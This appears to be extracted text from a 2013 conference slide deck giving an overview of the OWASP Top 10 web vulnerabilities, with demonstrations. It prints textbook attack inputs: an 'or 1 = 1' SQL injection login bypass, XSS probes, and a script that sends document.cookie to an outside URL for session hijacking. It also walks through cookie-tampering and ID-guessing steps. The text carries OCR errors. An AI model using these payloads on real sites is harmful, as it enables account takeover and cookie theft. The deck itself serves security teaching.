16th Annual Karnataka Conference

Size: px

Start display at page:

Download "16th Annual Karnataka Conference"

Nicholas Fisher
6 years ago
Views:

1 16th Annual Karnataka Conference GRC Compliance to Culture JULY 19 & 20, 2013 Topic OWASP Top 10 An Overview Speakers Akash Mahajan & Tamaghna Basu

2 OWASP Top 10 An Overview The Open Web Application Security Project brings out web security guidance in various forms for different stakeholders for Application Security. Whilst the Top 10 Web Risks and Vulnerabilities is their most followed and used document, the awareness level about it is still pretty low. We will cover an overview of OWASP Top 10 from a security practitioners points of view and using a few demonstrations explain why you and your organization should actively follow and start utilizing this completely free and open resource. Whether you are contemplating starting an Application Security Program or would like to validate what you are already doing, this talk and demonstration will definitely give you something to think about.

3 OWASP Top 10 An Overview Akash Mahajan and Tamaghna Basu

4 OWASP Top 10 will enable you to separate signal from the noise

5 Na1onal Ins1tute of Standards and Technology (NIST) - USA Na1onal Security Agency (NSA) USA Payment Card Industry Security Standards Council - Worldwide Defence Informa1on Systems Agency (DISA) USA Europe Network and Informa1on Security Agency (ENISA) USA Other agencies like IEEE, ANSSI France, BSI Germany, Center for Internet Security USA, CPNI UK Who follows OWASP Top 10?

6 All the juicy data is in the app layer now

7 Vulnerability + Threat = Risk

8 Untrusted Input ANack In & Data Out

9 Untrusted Input

10 A1 - Injection OWASP Top 10 An Overview

11 A1 - SQL Injection Normal Login

12 A1 - SQL Injection Login Successful

13 A1 - SQL Injection Invalid Username/password

14 A1 - SQL Injection Type admin

15 A1 - SQL Injection DB error: You have an error in SQL syntax

16 A1 - SQL statement in error details: SELECT * FROM accounts WHERE username = admin AND password= admin

17 What we got: SELECT * FROM accounts WHERE username = admin AND password= admin SQL statement to bypass validation: SELECT * FROM accounts WHERE username = admin or 1 = 1 AND password= admin or 1 = 1 Attack vector: admin or 1 = 1 A1 - SQL Injection

18 A1 - SQL Injection admin or 1 = 1

19 A1 - SQL Injection Login bypass

20 A1 - SQL Injection Data extraction

21 A1 - SQL Injection

22 A3 Cross Site Scripting / XSS OWASP Top 10 An Overview

23 A3 - XSS

24 A3 - XSS User input is rexlected back to the page

25 A3 - XSS - <script>alert(1)</script>

26 A3 XSS Script got executed

27 A3 - XSS - <script>alert(document.cookie)</script>

28 A3 - XSS Got the cookie

29 <script>window.loca1on="hnp:// cookie="+document.cookie;</script> hnp:// Session Hijacking A3 - XSS - What is next?

30 Authentication Do I really know you?

31 On the internet nobody knows you are a dog

32 A2 - Broken Authentication & Session Management OWASP Top 10 An Overview

33 A2 Login with username ed

34 A2 Logged in as ed

35 A2 View Cookie name: uid, value: 16

36 A2 Change the value: 1

37 A2 Reload the page, user changed to admin

38 I am not sure if you are allowed to do that.

39 A4 Insecure Direct Object Reference OWASP Top 10 An Overview

40 hgps:// ANacker no1ces his acct parameter is 6065?acct=6065 He modifies it to a nearby number?acct=6066 ANacker views the vic1m s account informa1on A4 Accessing another person s account

41 A7 Missing function level access control OWASP Top 10 An Overview

42 ANacker no1ces the URL indicates his role /user/getaccounts He modifies it to another directory (role) /admin/getaccounts, or /manager/getaccounts Failure to Restrict URL Access Illustrated ANacker views more accounts than just their own

43 A8 Cross Site Request Forgery OWASP Top 10 An Overview

44 CSRF? Active Connection Vic1m Sends request with cookie without his knowledge Web Applica1on Fake Link with some fancy offer ANacker

45 Security Mistakes Its funny when it happens to others

46 You ran the web server as root with 777 for uploads!

47 Network Solu1ons s shared Wordpress hos1ng rwxrwxrwx 1 root root :21 wp- config.php A5 Security MisconXigurations

48 A6 Sensitive Data Exposure

49 A9 Using components with known vulnerabilities

50 A1 - Injec1on A3 Cross Site Scrip1ng Untrusted Inputs A2 - Broken Authen1ca1on & Session Management A4 - Insecure Direct Object Reference A7 - Missing func1on level access control A8 - Cross Site Request Forgery Authen1ca1on /Authoriza1on A5 - Security Misconfigura1on A6 - Sensi1ve Data Exposure A9 - Using vulnerable components Security Mistakes Recap

51 Use OWASP and write secure apps Conclusions

52 Do you have any questions?

Top 10 Web Application Vulnerabilities

Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!! Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other